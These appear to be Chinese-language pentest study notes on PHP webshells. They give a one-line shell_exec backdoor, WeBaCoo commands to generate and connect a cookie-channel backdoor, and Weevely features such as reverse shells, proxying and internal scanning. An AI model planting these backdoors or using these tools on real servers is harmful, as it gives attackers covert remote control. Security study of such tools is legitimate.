- <?php echo shell_exec($_GET[‘cmd’]);?>
- 中国菜刀:http://www.maicaidao.co
- 可能被IDS、AV、WAF、扫描器软件发现查杀
webacoo
- WeBaCoo(Web Backdoor Cookie)
- 类终端的shell
- 编码通信内容通过cookie头传输,隐蔽性较强
- cm:base64编码的命令
- cn:服务器用于返回数据的cookie头的名
- cp:返回信息定界符
- 生成服务端
webacoo -g -o a.php
webacoo-t -u http://1.1.1.1/a.php
weevely
- 隐蔽的类终端php webshell
- 30多个管理模块
- 执行系统命令、浏览文件系统
- 检查服务器常见配置错误
- 创建正向、反向TCPshell连接
- 通过目标计算机代理http流量
- 从目标计算机运行端口扫描,渗透内网
- 支持连接密码